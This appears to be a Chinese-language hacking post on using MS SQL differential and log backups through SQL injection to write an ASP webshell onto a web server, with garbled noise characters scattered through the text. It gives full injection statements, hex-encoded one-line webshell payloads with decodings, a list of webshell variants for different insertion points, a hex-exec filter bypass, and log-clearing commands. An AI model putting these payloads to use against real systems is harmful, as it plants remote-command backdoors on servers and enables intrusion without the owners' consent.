MSsql差异备份总结

admin

差异备份的流程大概这样：
- n9 e  h' {- S+ R+ {1.完整备份一次(保存位置当然可以改)
$ [( P2 x+ z* @# _backup database 库名 to disk = 'c:\ddd.bak';--
6 l( E# N+ B2 u
/ ^. R  S% `. g2.创建表并插曲入数据
8 j! i7 }* j) R) |create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
/ G& F: E  E8 G6 y/ q5 I
3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
7 ?. m/ B9 g* ~- b1 T* l
上面
9 G/ m/ |) M% {4 `0x3C25657865637574652872657175657374282261222929253E
' b3 B+ u! t( R# q, ^" ?# `# Q就是一句话木马的内容：<%execute(request("a"))%>

如下是网上常见的差异备份代码，思路一样！
* }0 \1 J! ^$ I9 X1 M, r. Z===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
+ ^. M- C( y  C7 t1 o/ f3 X步骤:

6 p3 |3 Y. x5 |3 v# }6 V# Mdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
: u* m' ]6 i/ U8 Q' h
5 Z' `% O% ^$ p* n. jcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
. d, ~! U" R" e
; k/ j3 M8 ^! k, K3 U/ i" c+ {1 Y7 {
* e% I9 D) q  iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

# f4 H7 K0 f- D( V, T' R% w6 {declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
6 [% v$ X; K3 u
& q) x7 O( M/ f' [' `0 k4 Z5 J- ndrop table [xiaolu]  -- 删除此表。

" N) o3 |* n0 R' F0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
  R: x# V0 k! K( J, D
6 t% l7 L% c1 p- {: ~8 U' V% x* {* R  q声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================

我发现上面代码，有时会无效，而直接用

) }2 v, ^; |0 o+ |/ s6 p! P' ubackup database 库名 to disk = 'c:\ddd.bak'
: [; g( @% _) ]  V! ]3 r
create table [dbo].[dtest] ([cmd] [image]);
1 @6 _$ m, h' G. @" U  F' z: j
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
! r4 w; n4 F% [3 a$ [: q4 R0 A
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
  F+ F; }3 P& ~; P! c+ M# w, D" m4 G
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

' z( J3 v: f3 F" J6 S库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
=====================================================
/ r4 s* o7 X' u$ t1 s4 p* ^* }另一种log增量备份技术:
0 f) N# h0 c1 L& h) A* V3 [0 Z
';alter database null set RECOVERY FULL--
( j# o( T3 [# t+ t# I
';create table cmd (a image)--

9 o1 p  X6 z$ B' I/ W' c6 r. a3 y';backup log null to disk = 'f:\cmd' with init--
# n1 M, Y$ t7 ?( U% a4 B
) J$ l% v! Z5 T# T';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--

9 F6 j: ~  K% s% x) ^# e- U';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--
- q/ c) T- O0 j+ ?7 R- A
- E; X9 m- B( W$ _9 @- r8 y0 a- }PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
; t! c, L5 a3 R! g0 g8 c
说到一句话马，还可以有这么几种写法：
0 S2 f+ ]# ^6 ^2 Z0 H
a)<%%25Execute(request("a"))%%25>
( |( e5 r1 |8 M8 o0 b, z/ z3 \b)<%Execute(request("a"))%>
  ~' S1 H! \7 o  Bc)%><%execute request("a")%><%
* H" @+ m% y" }+ W- y+ Y! v; B6 Cd)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
  V2 y  g, ], A* y6 _$ ag)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
3 u9 P' O1 y6 w  vh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================
. {) k6 h: w5 {/ Z; ~# O: j& |4 X
当遇到差备过滤了/时用这个语句代替

; p. R& ^# [2 y" z/ b& h& adeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

  X3 W! {! f' Q9 _: c把要执行的语句转16进制然后用exec执行
8 u# g2 s# u" P, K  Z; O# k& B

- j1 ?3 _+ L: ~7 U8 }0 _减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
- }: D7 M& F2 y5 b1
4 [0 l* G* y& s1 V# P% k* j3 P+ T' Eid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
! K& y+ R- N, @( U6 T5 s! t2
4 c9 A2 T& J7 f* p! h# x1 x! A% Tid=1;backup database model to disk='你的路径‘ with differential,format;--

# @+ b; [# I/ h2 Y6 Q- ^. L2 R

& b# s  ]/ G6 _! R& v+ T* X0 eSQL语句清理日志
注：test为数据库名

--清空日志
, q/ G0 @& _, Q3 oDUMP TRANSACTION test WITH NO_LOG
) j& ~& ^: B5 W
( E, P4 V$ ^' g--截断事务日志
BACKUP LOG test WITH NO_LOG
1 h. m) p$ b( z: t  G, m* d
% O" s9 |8 x  l$ u  Y1 u' D--收缩数据库
/ L4 _* s2 j3 Z! g2 L+ XDBCC SHRINKDATABASE(test)
  i1 H0 ^+ g$ A4 A! \! E. H
: P7 v# _: N1 n6 }--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

: E- _. t6 u. k& _--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'